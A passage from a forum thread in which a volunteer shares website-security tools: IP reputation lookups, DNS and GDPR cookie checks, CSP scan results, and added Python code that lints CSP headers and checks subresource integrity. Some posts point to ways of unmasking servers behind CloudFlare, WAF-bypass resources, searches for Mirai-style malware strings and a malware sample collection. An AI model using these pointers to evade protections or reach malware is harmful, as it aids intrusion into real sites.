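        warning.append("base-uri missing or loose: injected <base> can retarget relative URLs")
    script = p.get("script-src", [])
    if "'unsafe-inline'" in script:
        if any(s.startswith(NONCE_OR_HASH) for s in script):
            info.append("script-src: nonce-aware browsers ignore 'unsafe-inline'; "
                        "it only keeps pre-CSP2 browsers working")
        else:
            fatal.append("script-src: 'unsafe-inline' without nonce/hash allows inline injection")
    if "default-src" not in p:
        for d in FETCH_DIRECTIVES:
            if d not in p:
                info.append(f"{d} missing and no default-src to fall back on")
    if "report-uri" not in p and "report-to" not in p:
        info.append("no report-uri/report-to: violations will not be reported")
    return {"fatal": fatal, "warning": warning, "info": info}


# The policy quoted in the post (nonce value as printed there).
QUOTED_POLICY = ("script-src 'nonce-aPfse2kvXXXXXXBu8VkzKA' 'report-sample' 'unsafe-inline'; "
                 "object-src 'none'; base-uri 'self'; worker-src 'self'; report-uri /cspreport")
# My suggested fix: every directive the report asked for, restricted to 'self'/'none'.
HARDENED_POLICY = QUOTED_POLICY + (
    "; default-src 'none'; frame-ancestors 'none'; form-action 'self'; "
    "upgrade-insecure-requests; style-src 'self'; img-src 'self'; connect-src 'self'; "
    "font-src 'self'; manifest-src 'self'; media-src 'none'; prefetch-src 'self'; "
    "child-src 'self'; frame-src 'self'")

if __name__ == "__main__":
    for label, policy in (("quoted", QUOTED_POLICY), ("hardened", HARDENED_POLICY)):
        findings = check_csp(policy)
        print(f"{label}: {len(findings['fatal'])} fatal, "
              f"{len(findings['warning'])} warnings, {len(findings['info'])} info")
        for level in ("fatal", "warning", "info"):
            for msg in findings[level]:
                print(f"  [{level}] {msg}")
```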
Title: Re: Tests and other Media topics
Post by: polonus on December 27, 2021, 06:36:45 PM
Website security analysis - Snyk: https://snyk.io/test/website-scanner/?test=
Best result = A, bad result = F.

pol
Title: Re: Tests and other Media topics
Post by: polonus on December 29, 2021, 11:35:27 PM
Hi folks on the avast support forums. From me best wishes for the coming New Year 2022.
May you stay free of any mishap both offline as well as online.

This time my question was: "Who is behind CloudFlare?".

Whenever you do an IP look-up at a CloudFlare protected website, like for instance shodan.io,
CloudFlare may block you as a visitor. This is whenever they cannot fully identify you.
You cannot go there anonymously. No tor-users are allowed on their platform either,
even when you aren't into any mischief.
You are banned until you can give proof of who you really are as a human being (real IP).

In such cases it can be interesting to know who is behind a certain CloudFlare reverse proxy address.
You can look it up at: https://securitytrails.com/list/ip/104.18.12.238  (example for shodan.io) (random example by me, pol).

Mind to do your look-ups at securitytrails.com not from behind a proxy, else you will also meet with their endless captcha,
even when you are not a bot and strictly an anonymous human. They also are CloudFlare driven.

It is a pity the extension to see whether one was safe from NSA spoofing on a particular website
is now no longer available as a Google or Chromium extension.
Their new extension and API restricting settings will make blocking etc. much harder.
Coming to a browser near you in the forthcoming months, I think May 2022.

A couple of extension developers have already thrown the towel into the developer's ring.
Well the going gets narrow, as some clamps seem to be coming down.

It is a pity really and actually a shame for the last bit of end-user-autonomy.
I use a London-based in-browser proxy by Digital Ocean in the browser
and have experienced above scenario various times.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on January 07, 2022, 01:10:45 AM
Learn more device info via your browser of choice here:
https://www.deviceinfo.me/

Scan, scroll down and enjoy.

An ip-scan for malicious and suspicious IP and percentages on ranges:
https://maltiverse.com/ip/161.35.53.213  (random example)

polonus
Title: Re: Tests and other Media topics
Post by: polonus on January 15, 2022, 01:37:34 PM
Test whether your domain is GDPR-compliant: https://2gdpr.com/

These forums of ours had the following issues:

Prior consent to other than strictly necessary cookies (ePrivacy)
Possible problems! Hide
What's the Problem:
Cookies installed during the loading of pages are not strictly necessary. For EU users these cookies can be installed after obtaining prior consent (Rec. 30 and Rec. 32 of the GDPR)

How to Solve it:
On the site you need to install prominent and specific cookie-banner with a consent form to get user consent, or to block cookies in case of consent refusal. You can create such cookie consent here

Pages list:
Below are the webpages loaded and cookies that require prior consent from EU users to be installed:

https://forum.avast.com/index.php?topic=315188.msg1675451
Cookie (Google Analytics): _gid; _ga; _gat;
https://forum.avast.com/
Cookie (Google Analytics): _gid; _ga; _gat;
https://forum.avast.com/index.php
Cookie (Google Analytics): _gid; _ga; _gat;
https://forum.avast.com/index.php?action=help
Cookie (Google Analytics): _gid; _ga; _gat;
https://forum.avast.com/index.php?action=search
Cookie (Google Analytics): _gid; _ga; _gat;
https://forum.avast.com/index.php?board=125.0
Cookie (Google Analytics): _gid; _ga; _gat;
https://forum.avast.com/index.php
Cookie (Google Analytics): _gid; _ga; _gat;
https://forum.avast.com/index.php
Cookie (Google Analytics): _gid; _ga; _gat;
https://forum.avast.com/index.php
Cookie (Google Analytics): _gid; _ga; _gat;
https://forum.avast.com/index.php
Cookie (Google Analytics): _gid; _ga; _gat;
https://forum.avast.com/index.php
Cookie (Google Analytics): _gid; _ga; _gat;
https://forum.avast.com/index.php
Cookie (Google Analytics): _gid; _ga; _gat;
https://forum.avast.com/index.php
Cookie (Google Analytics): _gid; _ga; _gat;
https://forum.avast.com/index.php
Cookie (Google Analytics): _gid; _ga; _gat;
https://forum.avast.com/index.php?topic=315479.msg1675505
Cookie (Google Analytics): _gid; _ga; _gat;
https://forum.avast.com/index.php?board=126.0
Cookie (Google Analytics): _gid; _ga; _gat;
https://forum.avast.com/index.php?board=127.0
Cookie (Google Analytics): _gid; _ga; _gat;
https://forum.avast.com/index.php?board=128.0
Cookie (Google Analytics): _gid; _ga; _gat;

Like in Austria this could mean Google Analytics can no longer be used in the EU.

Steps that could be taken to make Google Analytics more privacy compliant, script:
Quote
<!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-xxxxxxx-x"></script>
<script>
window.dataLayer = window.dataLayer || [];
function gtag(){dataLayer.push(arguments);}
gtag('js', new Date());
gtag('config', 'UA-xxxxxxx-x', { 'anonymize_ip': true }); // ##: this enables IP masking
</script>

polonus
Title: Re: Tests and other Media topics
Post by: polonus on January 15, 2022, 10:52:12 PM
I should admit that the script that is being presented in the previous posting (quote)
is more or less a form of window-dressing, because that IP has been loaded from Google's servers beforehand anyway. That IP has been made pseudo-anonymous. Google can calculate it anyway.
Actually Google Analytics is 'spook-ware', coming with all that JavaScript included.

Through just this line of code Google knows the IP through that script being loaded:
<script async src="htxps://www.googletagmanager.com/gtag/js?id=UA-xxxxxxx-x"></script>

So as coming from the EU we users may find websites outside of the EU blocking us.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on January 22, 2022, 03:33:26 PM
Whenever one finds oneself blocked by CloudFlare, it could be helpful to know the real IP of that particular website: https://shadowcrypt.net/tools/cloudflare

Other interesting tools can be found there also: https://shadowcrypt.net/tools/tor-checker

And this one: https://shadowcrypt.net/tools/asn-finder
Random example:
Quote
Results of 122.161.48.17

122.161.48.0/20
PACNET (proxy-registered route object)
This route object is for a PACNET customer route which is
This route object was created because no existing route
ANC peers filter based on these objects this route
122.161.48.0/24

polonus
Title: Re: Tests and other Media topics
Post by: polonus on January 22, 2022, 04:58:46 PM
Tested IP leaks for my browser VPN, see: https://www.whatsmydns.net/#A/138.68.180.132
at //www.top10vpn.com/tools/do-i-leak/

Results:
IPv4/IPv6             No Leak
DNS                     No Leak
WebRTC                No Leak
Geolocation           No Leak
Additional Tests     No Leak

Testing the Great Firewall now using BLOCKY:
https://blocky.greatfire.org/

Recently blocked: https://en.greatfire.org/https/forum.avast.com/index.php%
No censorship detected October last: https://blocky.greatfire.org/detail/169946/http%3A%2F%2Fforum.avast.com

polonus
Title: Re: Tests and other Media topics
Post by: polonus on January 23, 2022, 01:37:57 PM
DNS checker: https://www.nslookup.io/dns-records/bitchute.com (random example)

Also: https://mxtoolbox.com/SuperTool.aspx?action=dns%3abitchute.com&run=toolpage

Checked against Cloudflare Resolver Tool: https://shadowcrypt.net/tools/cloudflare

Also consider: https://dnschecker.org/ip-location.php?ip=67.205.164.246

See: https://dnschecker.org/mx-lookup.php?query=bitchute.com&dns=opendns

Re-analyzed: https://dnsviz.net/d/bitchute.com/dnssec/
Server status: https://dnsviz.net/d/bitchute.com/servers/
and https://www.shodan.io/host/108.162.192.119

Enjoy my good friends, enjoy,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on January 23, 2022, 03:01:32 PM
Scamalytics of a coinbase tollfree number spammer.

Reported here: https://ip-46.com/95.215.45.68#ip-feeds

Squid vulnerabilities on server: https://www.shodan.io/host/95.215.45.68

Fraud score: 43 -> https://scamalytics.com/ip/95.215.45.68

Hox VPN data: https://spur.us/context/95.215.45.61 (self-advertising data)

IP involved here: https://www.hybrid-analysis.com/sample/64f4c8bdec5ede3a53a7622c072eff4ece6bf5cab599a148bc639d074b5c8be1?environmentId=100

Raychat data: https://intelx.io/?s=95.215.45.68
Read: https://www.spiderfoot.net/how-much-data-do-you-leak-online-unintentionally/  (source info credits go to SM7 software)

polonus
Title: Re: Tests and other Media topics
Post by: polonus on January 23, 2022, 10:53:07 PM
Information to circumvent CloudFlare blocking from behind a proxy or VPN,
use the CloudFlare resolver tool: https://shadowcrypt.net/tools/cloudflare
and also via the info here at https://waf-bypass.com for CloudFlare, Amazon etc. etc.

Also handy when the newly planned EU DNS with URL-filter will be implemented,
or whenever one is being blocked working a tor browser.

Big Brother will be inviting you to a cat- and mouse-game for the last remnants of your privacy and free info gathering. That is what the future has in store for us all (opinion-checking etc.).

Test your WAF online here: https://labs.cloudbric.com/wafer/waf (change DNS to verify)

polonus
Title: Re: Tests and other Media topics
Post by: polonus on February 07, 2022, 11:43:37 AM
Report a PHISH to the Phish-bowl:
https://uthsc.edu/its/cybersecurity/phish-bowl.php

Phishing-investigation:
https://xsoar.pan.dev/docs/reference/playbooks/phishing-investigation---generic-v2

Fighting scam and spam on the Interwebz:
https://419scam.org/emails/2022-01/04/02115157.92.htm  (random example)

polonus
Title: Re: Tests and other Media topics
Post by: polonus on February 12, 2022, 02:08:54 PM
20.000 WordPress CMS websites found vulnerable to critical PHP leaks.

Only 31% of such websites have chosen to patch:
https://wordpress.org/plugins/php-everywhere/advanced/

See how weak PHP and fatal errors in coding can easily produce disaster:
https://www.fatalerrors.org/a/php-weak-type-code-commadn-injection.html

So with PHP-encoded CMS:  "Don't EVER trust user input anywhere".

Have a slick website developed, but forget to spend money on any maintenance.
So weak PHP, later a small exploit, and your website can get hacked and worse.

polonus

Title: Re: Tests and other Media topics
Post by: polonus on February 12, 2022, 05:38:23 PM
Various online tools, example: https://online-toolz.com/tools/html-validator.php

When valid you get "valid". Valid found here: -fusedeck.com (random example).

polonus
Title: Re: Tests and other Media topics
Post by: polonus on February 14, 2022, 12:04:41 PM
Scanned this particular random site through
@ https://www.web-malware-removal.com/website-malware-virus-scanner/

Cloaking found on the webserver.
Server Details:

apache

Google and Web-Browser Content different!
Google: 63763 bytes       Firefox: 63967 bytes,    Diff:   204 bytes

l" class="rss_link">rss</a> <a href="hxtps://twitter.com/securitynl" target="_blank" class="twitter_link">twitter</a> </div> </div> </div> </div> </body> </html> ...

Above was found using Free Website Malware / Virus Scan

The cloaking was not found to reside on the website while scanning at:
https://isithacked.com/check

polonus (3rd party cold recon website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on February 15, 2022, 05:20:19 PM
IP look-up -> https://www.robtex.com/ip-lookup/103.92.43.40#quick
then https://www.threatminer.org/host.php?q=103.92.43.40#gsc.tab=0&gsc.q=103.92.43.40&gsc.page=1
then https://www.abuseipdb.com/check/103.92.43.40 and https://www.projecthoneypot.org/ip_103.92.43.106

abuse - dictionary attacker, Indian top mail server and accordingly mail abuse.

pol
Title: Re: Tests and other Media topics
Post by: polonus on February 17, 2022, 04:04:38 PM
Stable Trackers List - interesting:
https://newtrackon.com/list

Random examples:
Quote
-dp://tracker.dler.com:6969/announce
-udp://fe.dealclub.de:6969/announce
-udp://movies.zsw.ca:6969/announce
-udp://6ahddutb1ucc3cp.ru:6969/announce
udp://abufinzio.monocul.us:6969/announce
-http://btracker.top:11451/announce
-udp://vibe.sleepyinternetfun.xyz:1738/announce
-udp://tracker.torrent.eu.org:451/announce
-udp://tracker.auctor.tv:6969/announce
-https://tr.burnabyhighstar.com:443/announce
-udp://tracker.sylphix.com:6969/announce
-udp://torrentclub.space:6969/announce
-udp://tracker.srv00.com:6969/announce
-udp://tracker.opentrackr.org:1337/announce
etc. etc.

Not being flagged elsewhere, see: https://quttera.com/detailed_report/torrentclub.space

polonus
Title: Re: Tests and other Media topics
Post by: polonus on February 18, 2022, 05:40:16 PM
How did you score here? Instant Security Scan by Zscaler.
Re: http://securitypreview.zscaler.com/#

pol
Title: Re: Tests and other Media topics
Post by: DavidR on February 18, 2022, 06:20:56 PM
How did you score here? Instant Security Scan by Zscaler.
Re: http://securitypreview.zscaler.com/#

pol

I don't know if this was also your intent as the http prefix triggers Firefox http every check.

Allowing it does a redirect to what is also an http page, which is pretty poor on the part of Zscaler when this is supposedly a security based check ???

So I didn't proceed any further, who knows if they would then spring a 'what are you doing visiting non https pages' comment.
Title: Re: Tests and other Media topics
Post by: polonus on February 19, 2022, 04:10:15 PM
Hi DavidR,

Thank you for your well appreciated comments.
I gave the Zscaler online scanner info as I found it online.

There seems to exist more and more online that is not quite keeping up to standards as we have known them in the past
(from 1998 up until now). Every av-vendor and also Zscaler has now jumped on the data-slurping bandwagon.

Front-ends appearing like intelx.io and https://nitter.eu (Enter username). Intelligence for couch-potatoes. ;)

Then this for instance data towards a certain end (an utterly and completely random choice by me, pol):
https://metrics.torproject.org/rs.html#details/4AA0035604DF40E5BA20DBE88EF6D11432421BFA
&
https://udger.com/resources/ip-list/tor_exit_node
&
https://github.com/SecOps-Institute/Tor-IP-Addresses

To know what one is up against with cybercrime and alleged cybercrime, one has to study much, hence read and read.
Your adversary also does, so we cannot do without. So please go on and comment further on the contents of this thread.

I just like to trigger end-users' awareness. Being generally dumbed down is a process we all will undergo more and more anyway.
So to go up against this process and reverse it a bit towards rewarding and good ends is what I venture out for.
Sort of see that as my mission here as a website error-hunter of sorts.

your avast-forum-friend,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on February 19, 2022, 05:04:51 PM
To know threat issues -> https://maltiverse.com/ip/51.15.7.157
and https://www.ip-lookup.org/location/51.15.7.157
and https://www.maxmind.com/en/high-risk-ip-sample/51.15.7.157
and https://www.abuseipdb.com/check/51.15.7.157  (important as IP-info-resources)

pol
Title: Re: Tests and other Media topics
Post by: polonus on March 01, 2022, 04:29:40 PM
Test DNS Propagation:

https://dnsmap.io/#A/
https://www.whatsmydns.net/#A/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on March 02, 2022, 01:34:06 PM
Also good to have inside your IP-checking-tool-chest:
https://ipinfo.info/html/ip_checker.php

Something to check against: https://blackip.ustc.edu.cn/sshrawlist.php?ip=37.49.226.220 (random example given).
and https://ipinfolookup.com/

pol
Title: Re: Tests and other Media topics
Post by: polonus on March 05, 2022, 01:43:57 PM
See what tracking techniques a website may use:

https://themarkup.org/blacklight?url=  (A Real-Time Website Privacy Inspector by Surya Mattu)

polonus
Title: Re: Tests and other Media topics
Post by: polonus on March 18, 2022, 10:04:36 PM
Very helpful in fighting scam:
https://www.scam-detector.com/
Also use the website validator there.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on March 22, 2022, 11:35:11 AM
94,7% of websites will not honor your cookie preferences.
One could therefore install this extension to get rid of cookies that you do not want to allow in.
https://chrome.google.com/webstore/detail/cookieblock/fbhiolckidkciamgcobkokpelckgnnol?hl=en

See: https://karelkubicek.github.io/post/cookieblock

polonus
Title: Re: Tests and other Media topics
Post by: polonus on March 26, 2022, 06:23:30 PM
Code page search engine, example -> https://publicwww.com/websites/caf.js/

Or in the case of this cloaking parked-website adsense ad-campaign:
https://publicwww.com/websites/parking.bodiscdn.com/

Then search on here: https://intelx.io/?s=+http%3A%2F%2Fww1.torrent9.bz%2F

Enjoy, my good friends,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on March 27, 2022, 02:33:04 PM
With such specific search engines there is a possibility to search for malware code snippets, like those of Mirai bot malware or bitcoin darknet, so we searched for bins/ppc (pay per click) as found at URLhaus -> https://urlhaus.abuse.ch/browse/

See results: https://publicwww.com/websites/bins%2Fppc/   359 webpages in all waiting to be analyzed.

Also see this for bin/sh mips/Mozi/elf malware: https://publicwww.com/websites/bin%2Fsh/
But mind that not all results will match what we are searching for; we have to discriminate.

Or we have to sign up for paid results in case of a search for bins/arm6 depth:all
Also more here: https://www.guardicore.com/botnet-encyclopedia/bins/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on March 27, 2022, 04:44:40 PM
Investigating banned crawl.baidu.com for baidu spider:
https://www.fortypoundhead.com/botinfo.asp?rid=153
https://www.fortypoundhead.com/tools_ipcheck_detail.asp?banid=567174
https://rdnsdb.com/116.179.32.0/24
and https://publicwww.com/websites/crawl.baidu.com/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on March 28, 2022, 03:35:51 PM
Why is this site not given as insecure here, as Google Safebrowsing does?
Re: htxps://lb.larevet.net/ -> https://dnslytics.com/ip/147.78.144.6
Missed here: https://www.virustotal.com/gui/url/58e823564e976ab653a4e5d47d17b9b49aac1d26f784e5682f33d1935056b7da
Connection is not private:
NET::ERR_CERT_COMMON_NAME_INVALID
Subject: *.geneanet dot org  (do not go there, as avast flags this as a phishing site!).

Issuer: Gandi Standard SSL CA 2

Expires on: 11 mar 2023

Current date: 28 mar 2022

PEM encoded chain:
-----BEGIN CERTIFICATE-----
MIIGMzCCBRugAwIBAgIRAJnvRbQbrOGRT5BHeHYJAgYwDQYJKoZIhvcNAQELBQAw
XzELMAkGA1UEBhMCXXXXXXXXXXXXXXXXXXXXcmlzMQ4wDAYDVQQHEwVQYXJpczEO
MAwGA1UEChMFR2FuZGkxIDAeBgNVBAMTF0dhbmRpIFN0YW5kYXJkIFNTTCBDQSAy

polonus
Title: Re: Tests and other Media topics
Post by: polonus on March 29, 2022, 01:20:28 PM
Resources to search: https://maltiverse.com/search;query=lb01.parklogic.com;page=1;sort=creation_time_desc

Searching using a known malicious address query: ( do not click  any links to malware) https://maltiverse.com/search;query=alibiaba.bugs3.com;page=2;sort=creation_time_desc
and then stumbling unto this malware analysis: https://maltiverse.com/url/c14b2080fbe8d03f30d4030d00e6da522533fe4e276d2387cb52ca0942748fd1

polonus (volunteer 3rd party cold recon website security-analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on April 05, 2022, 06:44:43 PM
Genuine scansite or just to get clickbait?
Re: https://www.scamvoid.net/check/qanator.com/  (not flagged as a scam).
Not flagged here either: https://www.virustotal.com/gui/url/66ea09f3b796804db46fbb98b33e1513b60c8fbc12e403ff28ea36925e4e3114
See: bootstrap   4.0.0-beta   Found in -https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0-beta/js/bootstrap.min.js _____Vulnerability info:
Medium   XSS is possible in the data-target attribute. CVE-2016-10735   

Functioning in browser according to console info
Quote
Failed to load resource: net::ERR_BLOCKED_BY_CLIENT
VM210:81 audioblocktrue
VM210:130 canvasfont = true
qanator.com/:1 Unchecked runtime.lastError: Could not establish connection. Receiving end does not exist.
qanator.com/:1 Failed to find a valid digest in the 'integrity' attribute for resource '-https://code.jquery.com/jquery-3.2.1.slim.min.js' with computed SHA-256 integrity 'hwg4gsxgFZhOsEEamdOYGBf13FyQuiTwlAQgxVSNgt4='. The resource has been blocked.
qanator.com/:1 Failed to find a valid digest in the 'integrity' attribute for resource '-https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.11.0/umd/popper.min.js' with computed SHA-256 integrity '/ijcOLwFf26xEYAjW75FizKVo5tnTYiQddPZoLUHHZ8='. The resource has been blocked.
bootstrap.min.js:6 Uncaught Error: Bootstrap's JavaScript requires jQuery. jQuery must be included before Bootstrap's JavaScript.
    at bootstrap.min.js:6
dD.js:1467
(unknown) Settings loaded...
intercept.js:1 Filter Running...
qanator.com/:1 Unchecked runtime.lastError: The message port closed before a response was received.
DevTools failed to load SourceMap: Could not load content for chrome-extension://gegfpbhjnhegdnjdkghhnneaocdbbhjp/firefox/browser-polyfill.min.js.map: HTTP error: status code 404, net::ERR_UNKNOWN_URL_SCHEME

Probably not functioning because blocked by CloudFlare for being behind a DigitalOcean proxy from London City.

polonus
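The two "Failed to find a valid digest in the 'integrity' attribute" messages above are the browser's Subresource Integrity check refusing a script whose hash does not match its integrity attribute. As an added illustration (not code from the post or from any site mentioned in it), this Python script reproduces that check on a constructed sample script body; the SHA-256 value from the console output is reused only as a known-mismatching digest.

```python
# Subresource Integrity (SRI) check, modelled on the browser behaviour behind
# the "Failed to find a valid digest in the 'integrity' attribute" console
# errors quoted above. Added example, not code from the forum post; the
# script body below is a constructed sample, not the real jQuery file.
from __future__ import annotations

import base64
import hashlib
import re

# Hash functions a browser accepts for SRI, with their relative strength.
_HASHES = {"sha256": hashlib.sha256, "sha384": hashlib.sha384, "sha512": hashlib.sha512}
_STRENGTH = {"sha256": 1, "sha384": 2, "sha512": 3}
_TOKEN = re.compile(r"(sha256|sha384|sha512)-([A-Za-z0-9+/=]+)(\?.*)?")

# Constructed stand-in for a fetched script body.
SAMPLE_SCRIPT = b"console.log('constructed sample script');\n"


def sri_digest(body: bytes, algo: str = "sha256") -> str:
    """Compute the integrity token a browser reports for a fetched resource,
    e.g. 'sha256-<base64 of the digest>'."""
    digest = _HASHES[algo](body).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


def parse_integrity(attr: str) -> list[tuple[str, bytes]]:
    """Split an integrity attribute into (algo, raw digest) pairs. Tokens with
    unknown algorithms are ignored, as the SRI spec instructs, and option
    suffixes after '?' are dropped."""
    pairs = []
    for token in attr.split():
        m = _TOKEN.fullmatch(token)
        if not m:
            continue
        b64 = m.group(2)
        raw = base64.b64decode(b64 + "=" * (-len(b64) % 4))
        pairs.append((m.group(1), raw))
    return pairs


def check_integrity(body: bytes, attr: str) -> tuple[bool, str]:
    """Return (allowed, computed_token).

    Browsers consult only the strongest algorithm listed and accept the
    resource if any digest of that algorithm matches. An attribute that is
    empty or lists only unsupported algorithms is treated as absent, so the
    resource loads (that is why a 'sha1-...' token gives no protection)."""
    pairs = parse_integrity(attr)
    if not pairs:
        return True, sri_digest(body)
    top = max(_STRENGTH[algo] for algo, _ in pairs)
    algo = next(a for a, s in _STRENGTH.items() if s == top)
    actual = _HASHES[algo](body).digest()
    matched = any(raw == actual for a, raw in pairs if a == algo)
    return matched, sri_digest(body, algo)


if __name__ == "__main__":
    ok, computed = check_integrity(SAMPLE_SCRIPT, sri_digest(SAMPLE_SCRIPT))
    print("matching attribute ->", "loaded" if ok else "blocked", computed)
    # The digest from the console output above belongs to a different file,
    # so against our sample it fails, exactly like the blocked jQuery load.
    ok, computed = check_integrity(
        SAMPLE_SCRIPT, "sha256-hwg4gsxgFZhOsEEamdOYGBf13FyQuiTwlAQgxVSNgt4=")
    print("mismatching attribute ->", "loaded" if ok else "blocked", computed)
```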
Title: Re: Tests and other Media topics
Post by: polonus on April 10, 2022, 07:02:52 PM
Maltiverse - versatile resources:
Here we will find various collections:
https://maltiverse.com/url/131adc8b091ddae67842065614a663af6dc7b42fceb3bef55841667b8639a578

Can be combined with other resources as https://urlhaus.abuse.ch/

Here in this case just for researchers only: -https://github.com/HynekPetrak/javascript-malware-collection
(Do not venture out there...)

polonus
Title: Re: Tests and other Media topics
Post by: polonus on April 29, 2022, 04:24:31 PM
Checking on last bad events from another resources: https://www.projecthoneypot.org/list_of_ips.php
Example: https://www.abuseipdb.com/check/134.119.216.167

Attacker into SQL-injection attacks. 

Also reported here manifold: https://ip-46.com/134.119.216.167

polonus
Title: Re: Tests and other Media topics
Post by: polonus on April 30, 2022, 11:04:06 AM
Also interesting to check on (spam) mail-harvesters, random example starting here: https://www.projecthoneypot.org/ip_46.4.55.55

Then checked on associated IP, 136.144.41.200 -

https://www.abuseipdb.com/check/136.144.41.200

https://www.psbl.org/listing?ip=136.144.41.200

https://multirbl.valli.org/detail/score.spfbl.net.html

https://maltiverse.com/ip/136.144.41.200   

https://www.shodan.io/host/136.144.41.200

For users with a special interest in the subject of spam:
https://forum.spamcop.net/topic/47073-serverion-spam-factory-review/

polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)

Title: Re: Tests and other Media topics
Post by: polonus on May 17, 2022, 11:58:05 AM
Torry.io , the Tor Anymous View search engine,
random query example: https://tor.torry.io/index.php?q=

Any downcasts in mapping the Tor-driven landscape? Can also be used as an extension inside Google chrome browser,
and similar browser types. Whenever a search-engine seems too good to be true for anonymous searching, then it likely is.
Anyone? I see a link to -hs.qacono.com.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on May 19, 2022, 07:24:59 PM
Could this be an alternative to the once WOT service?

Random example: https://www.scamdoc.com/view/877444

pol
Title: Re: Tests and other Media topics
Post by: polonus on May 21, 2022, 05:02:21 PM
Even Sucuri's website scan page does not have the best CSP policy.

Issues:
Quote
CSP Validity         Valid
XSS                     No CSP Protection
Clickjacking          No CSP Protection
Formjacking         No CSP Protection

General
Basic CSP Protection
Summary
11 Fatal Errors
12 Warnings
5 Info
1 Valid
Content Security Policy (CSP)
Edit CSP
upgrade-insecure-requests;
Report Only CSP
Enforced CSP
General
CSP
report-uri
Add 'report-uri' directive to receive violation reports. Setup a free report-uri at RapidSec
CSP
form-action
In order to add Formjacking protection, either 'form-action' or 'base-uri' should be strictly defined.
This directive does not fallback to 'default-src'. Can you restrict 'form-action' to 'none' or 'self'?
Necessary Directives
CSP
default-src
'default-src' is missing. Add it for more fine-grained control and reporting.
CSP
base-uri
In order to add Formjacking protection, either 'form-action' or 'base-uri' should be strictly defined.
Missing 'base-uri' allows the injection of base tags that set the base URL for all relative URLs. Used in XSS as CSP bypasses on the 'script-src' directive, and in Formjacking attacks - routing forms to an attacker controlled domain. Can you set it to 'none' or 'self'?
CSP
frame-ancestors
In order to add Clickjacking protection, either 'frame-ancestors', 'frame-src' or 'child-src' should be strictly defined.
'frame-ancestors' directive, is more powerful and flexible than the X-Frame-Options, and considered necessary in order to properly prevent Clickjacking attacks. Can you restrict 'frame-ancestors' to 'none' or 'self'?
As strict as 'frame-ancestors', 'frame-src' and 'child-src' will be ('self', 'none' or strict path allowlist), Clickjacking protection will be strongest.
CSP
upgrade-insecure-requests
Scripting Directives
CSP
script-src
In order to add XSS protection, 'script-src' should be strictly defined.
'script-src' is missing and recommended to increase XSS protection. Can you set 'none' or a specific file/path?
CSP
style-src
'style-src' is missing and recommended to increase general protection. Can you set 'none' or a specific file/path?
CSP
object-src
Missing 'object-src' allows the injection of plugins which can execute JavaScript. Can you set it to 'none' or 'self'?
CSP
worker-src
'worker-src' is missing and recommended to increase overall strength. It specifies valid sources for Worker, SharedWorker, or ServiceWorker scripts. Can you set 'none' or a specific file/path?
Frames Directives
CSP
child-src
In order to add Clickjacking protection, either 'frame-ancestors', 'frame-src' or 'child-src' should be strictly defined.
As strict as 'frame-ancestors', 'frame-src' and 'child-src' will be ('self', 'none' or strict path allowlist), Clickjacking protection will be strongest.
For backward compatibility, both 'child-src' and 'frame-src' should exist in order to protect Clickjacking, Formjacking, Data Exfiltration and more.
CSP
frame-src
In order to add Clickjacking protection, either 'frame-ancestors', 'frame-src' or 'child-src' should be strictly defined.
As strict as 'frame-ancestors', 'frame-src' and 'child-src' will be ('self', 'none' or strict path allowlist), Clickjacking protection will be strongest.
For backward compatibility, both 'child-src' and 'frame-src' should exist in order to protect Clickjacking, Formjacking, Data Exfiltration and more.
Content Directives
CSP
img-src
In order to add general protection, either 'img-src' or 'connect-src' should be strictly defined.
'img-src' is missing. Add it for more fine-grained control and reporting.
CSP
connect-src
In order to add general protection, either 'img-src' or 'connect-src' should be strictly defined.
'connect-src' is missing. Add it for more fine-grained control and reporting.
CSP
font-src
'font-src' is missing. Add it for more fine-grained control and reporting.
CSP
manifest-src
'manifest-src' is missing. Add it for more fine-grained control and reporting.
CSP
media-src
'media-src' is missing. Add it for more fine-grained control and reporting.
CSP
prefetch-src
'prefetch-src' is missing. Add it for more fine-grained control and reporting.
source CSP Scanner chrome extension info...

polonus
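The report above is essentially a list of directive checks. As an added example (not the scanner's or Sucuri's own code), the following Python linter applies the same rules, Formjacking, Clickjacking, XSS and the missing-directive notes, to a Content-Security-Policy header string, starting from the bare `upgrade-insecure-requests;` policy quoted above, a constructed hardened policy, and the CSP designer example quoted further down in this thread.

```python
# A minimal CSP linter that applies the checks of the scanner report quoted
# above (Formjacking, Clickjacking, XSS, plus the missing-directive notes).
# Added example, not the scanner's or Sucuri's code; the hardened policy is
# constructed for illustration.
from __future__ import annotations

# Directive groups each protection class relies on, per the report above.
FORMJACKING = ("form-action", "base-uri")
CLICKJACKING = ("frame-ancestors", "frame-src", "child-src")
# Fetch directives the report lists as "missing" when nothing covers them.
FETCH_DIRECTIVES = ("img-src", "connect-src", "font-src", "manifest-src",
                    "media-src", "style-src", "worker-src")

# The policy the scanner saw on the Sucuri scan page (quoted above).
SUCURI_POLICY = "upgrade-insecure-requests;"
# Constructed policy that passes every check in this linter.
HARDENED_POLICY = ("default-src 'self'; script-src 'self'; object-src 'none'; "
                   "base-uri 'self'; form-action 'self'; frame-ancestors 'none'; "
                   "report-uri /csp-report")
# CSP designer example quoted later in the thread.
DESIGNER_POLICY = ("default-src 'self' ; worker-src 'self' blob: ; "
                   "script-src 'self' 'unsafe-eval' 'unsafe-inline'")


def parse_csp(header: str) -> dict[str, list[str]]:
    """Turn a Content-Security-Policy header value into {directive: sources}.
    Directive names are case-insensitive; a repeated directive keeps its
    first occurrence, as browsers do."""
    policy: dict[str, list[str]] = {}
    for part in header.split(";"):
        tokens = part.split()
        if tokens:
            policy.setdefault(tokens[0].lower(), tokens[1:])
    return policy


def is_strict(sources: list[str] | None) -> bool:
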